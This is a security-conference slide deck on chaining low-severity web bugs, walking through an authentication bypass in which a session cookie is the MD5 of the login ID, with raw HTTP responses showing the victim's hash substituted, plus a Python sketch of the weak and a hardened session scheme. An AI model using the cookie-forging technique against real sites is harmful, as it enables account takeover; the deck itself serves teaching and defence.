Vulnerability Chaining Every Low Issue Has its big impact


Vulnerability Chaining: Every Low Issue Has Its Big Impact
Chandrakant Nial, Security Analyst

BIO
Chandrakant Nial is a security analyst, a practicing developer and a security bug hunter in Bhubaneswar. His career spans over 3 years, including time at TCS and work as an independent bounty hunter. His education includes a Bachelor's degree in Computer Science from BPUT, Orissa.

Agenda
- OWASP Top 10 2013
- Some low issues that we come across
- Typical mistakes by developers
- Chaining process
  - Analyzing the response and understanding the behavior of the application
  - Using multiple vulnerabilities
  - Knowledge of various technologies
- Impacts
  - Defacing a website
  - Account takeover
  - Deleting the codebase, databases, etc.
- Best practices / references
- Conclusion

Top 10 List
A1 - Injection
A2 - Broken Authentication and Session Management
A3 - Cross-Site Scripting (XSS)
A4 - Insecure Direct Object References
A5 - Security Misconfiguration
A6 - Sensitive Data Exposure
A7 - Missing Function Level Access Control
A8 - Cross-Site Request Forgery (CSRF)
A9 - Using Components with Known Vulnerabilities
A10 - Unvalidated Redirects and Forwards

Low Issues
- Unwanted HTTP methods (PUT, DELETE, HEAD)
- Cookie flags (low)
- Encryption (URL, Base64)
- Directory traversal
- Banner grabbing
- URL redirection
- Information disclosure, mixed content

Typical Mistakes
- Ignorance
- Unaware of security matters
- They don't care about security; functionality is all they want

Chaining Process: low bug

Chaining Process: chained bug

Chaining Process, Example 1: https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model

Chaining Process, Example 2: https://hackerone.com/reports/42961

Chaining Process: bypassing authentication
Consider two users:
- Attacker's login ID: attackerloginid, MD5 hash value: 636559678682db9e21c958a4df44eea4
- Victim's login ID: victimloginid, MD5 hash value: e9fc2abd9060fde1a67e3367b7d64bd0
Source: http://www.websecresearch.com/2014/05/a-way-to-bypass-authentication.html

Authentication Bypass
Original server response using the attacker's account with the wrong password:

HTTP/1.1 200 OK
Date: Wed, 7 May 2014 21:17:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pstoken=; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Content-Length: 16
Connection: close
Content-Type: text/html; charset=UTF-8

{"failed":false}

Authentication Bypass (continued)
Original response using the attacker's account with the right password:

HTTP/1.1 302 Found
Date: Wed,  7 May 2014 21:17:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pstoken=636559678682db9e21c958a4df44eea4; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Set-Cookie: pstoken=636559678682db9e21c958a4df44eea4; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Content-Length: 16
Connection: close
Content-Type: text/html; charset=UTF-8

{"success":true}

Authentication Bypass (continued)
Modified response, in which the attacker changed the response code, the Set-Cookie headers and their values, and the status value, and then sent it as a request. The pstoken cookie is simply the MD5 hash of the login ID, so the attacker substitutes the victim's hash for their own:

HTTP/1.1 302 Found
Date: Wed, 7 May 2014 21:17:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pstoken=e9fc2abd9060fde1a67e3367b7d64bd0; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Set-Cookie: pstoken=e9fc2abd9060fde1a67e3367b7d64bd0; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Content-Length: 16
Connection: close
Content-Type: text/html; charset=UTF-8

{"success":true}
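The root cause in the slides above is a session cookie derived from public data (pstoken = md5(login_id)), so the server cannot tell a minted cookie from a forged one. The added example below (not code from the talk or from the referenced site; the user table, passwords and function names are constructed) models the weak scheme beside a hardened one that issues random, server-side session identifiers, so a cookie computed from a login ID is simply unknown to the server.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional

# Constructed sample user table; the login IDs are the ones used in the slides.
# Plaintext passwords are a stand-in for a proper password hash store.
USERS = {"attackerloginid": "attacker-password", "victimloginid": "victim-password"}


def weak_issue_token(login_id: str) -> str:
    """The flawed scheme from the slides: pstoken = md5(login_id).
    The value depends only on the login ID, so anyone who knows a
    victim's ID can compute the victim's cookie without a password."""
    return hashlib.md5(login_id.encode()).hexdigest()


def weak_validate(pstoken: str) -> Optional[str]:
    """Server side of the weak scheme: the cookie is accepted if it matches
    md5 of any known login ID. Nothing ties it to a real login event."""
    for login_id in USERS:
        if hmac.compare_digest(pstoken, weak_issue_token(login_id)):
            return login_id
    return None


# Hardened scheme: the session identifier is a random value that exists only
# because a successful login created it, and the mapping lives on the server.
_SESSIONS: Dict[str, str] = {}


def secure_login(login_id: str, password: str) -> Optional[str]:
    """Check credentials; on success mint an unguessable session id."""
    expected = USERS.get(login_id)
    if expected is None or not hmac.compare_digest(expected, password):
        return None  # wrong password: no cookie is issued at all
    token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
    _SESSIONS[token] = login_id
    return token


def secure_validate(pstoken: str) -> Optional[str]:
    """A cookie is valid only if the server itself issued it."""
    return _SESSIONS.get(pstoken)
```

In the hardened scheme the attacker's forged cookie (the victim's MD5) is never a key in the server-side session table, so the request is treated as unauthenticated regardless of what status code or headers the attacker edits.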

Moral: how to start chaining?
- Find a vulnerability
- Analyze the bugs
- Research the customer's business

Demo

Moral
Vulnerable code + weak configuration = dangerous exploitation.
Every vulnerability needs to be patched, irrespective of its severity.
Questions, please.